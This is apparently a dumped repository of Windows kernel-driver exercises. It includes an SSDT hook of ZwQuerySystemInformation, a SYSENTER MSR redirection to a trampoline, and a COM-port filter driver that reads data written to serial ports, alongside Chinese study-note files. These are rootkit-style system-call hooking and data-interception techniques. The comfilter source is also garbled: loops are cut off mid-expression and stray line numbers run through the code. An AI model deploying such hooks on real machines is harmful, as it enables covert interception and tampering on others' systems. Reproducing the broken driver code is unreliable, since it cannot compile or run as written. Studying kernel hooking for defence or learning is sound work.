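    HOOKFUNC(ZwQuerySystemInformation, NewFunc, OldFunc);
    return TRUE;
}

/*
 * Restore the original service and release the alias.
 * NOTE(review): there is no reference count on callers inside NewFunc; the
 * one-second delay is a best-effort gap for them to leave before the image
 * is unmapped.
 */
VOID Unload(PDRIVER_OBJECT driver)
{
    LARGE_INTEGER delay;

    if (OldFunc && NewServiceDescriptorTable)
    {
        UNHOOKFUNC(ZwQuerySystemInformation, OldFunc);
        delay.QuadPart = -10 * 1000 * 1000;   /* relative, 1 s in 100 ns units */
        KeDelayExecutionThread(KernelMode, FALSE, &delay);
    }
    if (NewServiceDescriptorTable)
    {
        MmUnmapLockedPages(NewServiceDescriptorTable, MyMDL);
        IoFreeMdl(MyMDL);
        NewServiceDescriptorTable = NULL;
        MyMDL = NULL;
    }
    DbgPrint("In Unload");
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT driver, PUNICODE_STRING szReg)
{
    NTSTATUS status;

    DbgPrint("In DriverEntry");
    status = MAKEMyMDL();
    if (!NT_SUCCESS(status)) return status;
    if (!HookFunc())
    {
        /* DriverUnload is not invoked when DriverEntry fails: release the alias here */
        MmUnmapLockedPages(NewServiceDescriptorTable, MyMDL);
        IoFreeMdl(MyMDL);
        NewServiceDescriptorTable = NULL;
        MyMDL = NULL;
        return STATUS_UNSUCCESSFUL;
    }
    driver->DriverUnload = Unload;
    return STATUS_SUCCESS;
}

--------------------------------------------------------------------------------
/SSDTHook/SSDTHook.h:
--------------------------------------------------------------------------------
#ifndef SSDTHOOK_H
#define SSDTHOOK_H



#endif

--------------------------------------------------------------------------------
/SSDTHook/makefile:
--------------------------------------------------------------------------------
#
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
# file to this component. This file merely indirects to the real make file
# that is shared by all the components of the Windows NT DDK
#

!INCLUDE $(NTMAKEENV)\makefile.def

--------------------------------------------------------------------------------
/SSDTHook/sources:
--------------------------------------------------------------------------------
# $Id$
TARGETNAME=SSDTHook
TARGETPATH=obj
TARGETTYPE=DRIVER

# Create browse info
#BROWSER_INFO=1
#BROWSERFILE=

# Additional defines for the C/C++ preprocessor
C_DEFINES=$(C_DEFINES)

SOURCES=SSDTHook.c

--------------------------------------------------------------------------------
/SYSENTERHook/main.c:
--------------------------------------------------------------------------------
#include "ntddk.h"

/* IA32_SYSENTER_EIP: per-logical-processor MSR holding the SYSENTER target. */
#define IA32_SYSENTER_EIP 0x176

ULONG OldFunc;   /* original SYSENTER target (KiFastCallEntry), 0 until hooked */

/*
 * Write Target into IA32_SYSENTER_EIP on every active processor.
 *
 * The MSR is per-CPU. The original wrote it only on whichever CPU
 * DriverEntry or Unload happened to run on, so on a multiprocessor system
 * the other CPUs were never hooked and, worse, after unload the hooked CPU
 * kept pointing at freed driver memory while a different CPU was "restored".
 * Requires PASSIVE_LEVEL (affinity switching); assumes all CPUs share one
 * original target, which is how the kernel programs them.
 */
static VOID SetSysenterEipOnAllCpus(ULONG Target)
{
    KAFFINITY active = KeQueryActiveProcessors();
    KAFFINITY cpu;

    for (cpu = 1; cpu != 0; cpu <<= 1)
    {
        if (!(active & cpu)) continue;
        KeSetSystemAffinityThread(cpu);   /* make the wrmsr below run on this CPU */
        _asm
        {
            mov ecx, IA32_SYSENTER_EIP
            xor edx, edx                  ; high dword must be zero
            mov eax, Target
            wrmsr
        }
    }
    KeRevertToUserAffinityThread();
}

VOID Unload(PDRIVER_OBJECT driver )
{
    if (OldFunc)
        SetSysenterEipOnAllCpus(OldFunc);
}

/* Installed SYSENTER target: a pass-through that jumps to the saved original. */
__declspec(naked) void MyKiFastCallEntry()
{
    _asm jmp [OldFunc]
}

NTSTATUS DriverEntry(PDRIVER_OBJECT driver, IN PUNICODE_STRING szReg )
{
    ULONG current;

    driver->DriverUnload = Unload;

    _asm {
        mov ecx, IA32_SYSENTER_EIP
        rdmsr
        mov current, eax
    }
    if (current == (ULONG)MyKiFastCallEntry)
        return STATUS_SUCCESS;   /* already hooked: keep the real original in OldFunc */

    OldFunc = current;           /* must be visible before any CPU can reach the trampoline */
    SetSysenterEipOnAllCpus((ULONG)MyKiFastCallEntry);

    return STATUS_SUCCESS;
}

--------------------------------------------------------------------------------
/SYSENTERHook/makefile:
--------------------------------------------------------------------------------
#
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
# file to this component. This file merely indirects to the real make file
# that is shared by all the components of the Windows NT DDK
#

!INCLUDE $(NTMAKEENV)\makefile.def

--------------------------------------------------------------------------------
/SYSENTERHook/sources:
--------------------------------------------------------------------------------
# $Id$
TARGETNAME=SYSENTERHook
TARGETPATH=obj
TARGETTYPE=DRIVER

# Create browse info
#BROWSER_INFO=1
#BROWSERFILE=

# Additional defines for the C/C++ preprocessor
C_DEFINES=$(C_DEFINES)

SOURCES=main.c

--------------------------------------------------------------------------------
/comfilter/main.c:
--------------------------------------------------------------------------------
#include "ntddk.h"

#define NTSTRSAFE_LIB
#include "ntstrsafe.h"

#define MAX_COMS 32
#define NAME_LENGTH 30
#define STOPTIME -5000

PDEVICE_OBJECT realCom[MAX_COMS] = { NULL };
PDEVICE_OBJECT nextCom[MAX_COMS] = { NULL };

void Unload(PDRIVER_OBJECT driver)
{
ULONG i;
LARGE_INTEGER internel;
for (i=0; iType,0,FALSE, &realCom[i]);
if (status != STATUS_SUCCESS) continue;
realCom[i]->Flags = devObj->Flags | DO_DEVICE_INITIALIZING;
nextCom[i] = IoAttachDeviceToDeviceStack( realCom[i], devObj);
if (nextCom[i] == NULL)
{
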
IoDeleteDevice(realCom[i]); 49 | realCom[i] = NULL; 50 | continue; 51 | } 52 | realCom[i]->Type &= ~DO_DEVICE_INITIALIZING; 53 | } 54 | } 55 | 56 | NTSTATUS dispatch(PDEVICE_OBJECT device, PIRP irp) 57 | { 58 | NTSTATUS status; 59 | PIO_STACK_LOCATION irpsp = IoGetCurrentIrpStackLocation(irp); 60 | ULONG i, j; 61 | for (i=0; iMajorFunction == IRP_MJ_PNP_POWER) 66 | { 67 | PoStartNextPowerIrp(irp); 68 | IoSkipCurrentIrpStackLocation(irp); 69 | return PoCallDriver(nextCom[i], irp); 70 | } 71 | if (irpsp->MajorFunction == IRP_MJ_WRITE) 72 | { 73 | ULONG len = irpsp->Parameters.Write.Length; 74 | PUCHAR buffer = NULL; 75 | if (irp->MdlAddress != NULL) 76 | buffer = (PUCHAR)MmGetSystemAddressForMdlSafe( 77 | irp->MdlAddress, 78 | NormalPagePriority); 79 | else 80 | buffer = (PUCHAR)irp->UserBuffer; 81 | if (buffer == NULL) 82 | buffer = (PUCHAR)irp->AssociatedIrp.SystemBuffer; 83 | for (j = 0; jIoStatus.Information = 0; 93 | irp->IoStatus.Status = STATUS_INVALID_PARAMETER; 94 | IoCompleteRequest(irp, IO_NO_INCREMENT); 95 | 96 | return STATUS_SUCCESS; 97 | } 98 | 99 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 100 | { 101 | ULONG i; 102 | for (i=0; iMajorFunction[i] = dispatch; 105 | } 106 | driver->DriverUnload = Unload; 107 | AttachAll(driver); 108 | return STATUS_SUCCESS; 109 | } -------------------------------------------------------------------------------- /comfilter/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /comfilter/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=comfilter 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | TARGETLIBS= $(DDK_LIB_PATH)\ntstrsafe.lib 7 | 8 | # Create browse info 9 | #BROWSER_INFO=1 10 | #BROWSERFILE= 11 | 12 | # Additional defines for the C/C++ preprocessor 13 | C_DEFINES=$(C_DEFINES) 14 | 15 | SOURCES=main.c 16 | -------------------------------------------------------------------------------- /内核函数.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/内核函数.txt -------------------------------------------------------------------------------- /分段机制.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/分段机制.txt -------------------------------------------------------------------------------- /分页管理.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/分页管理.txt -------------------------------------------------------------------------------- /天书夜读.txt: -------------------------------------------------------------------------------- 1 | IoCallDriver 2 | PsSetCreateProcessNotifyRoutine 3 | PsSetLoadImageNotifyRoutine 4 | KiThreadStartup 5 | -------------------------------------------------------------------------------- /数据库专业课.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/数据库专业课.txt --------------------------------------------------------------------------------